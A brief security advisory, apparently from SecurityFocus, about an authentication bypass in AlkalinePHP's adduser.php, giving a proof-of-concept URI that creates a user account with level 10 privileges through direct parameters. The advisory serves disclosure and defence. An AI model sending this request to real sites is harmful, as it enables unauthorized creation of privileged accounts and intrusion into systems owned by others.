AlkalinePHP 'adduser.php' Security Bypass Vulnerability

Attackers can exploit this issue using a browser.

The following proof-of-concept URI is available:

http://www.example.com/adduser.php?real_name=null&user_name=[user]&password=[pass]&level=10&email=null@null.com&website=null&misc=null


 

Privacy Statement
Copyright 2010, SecurityFocus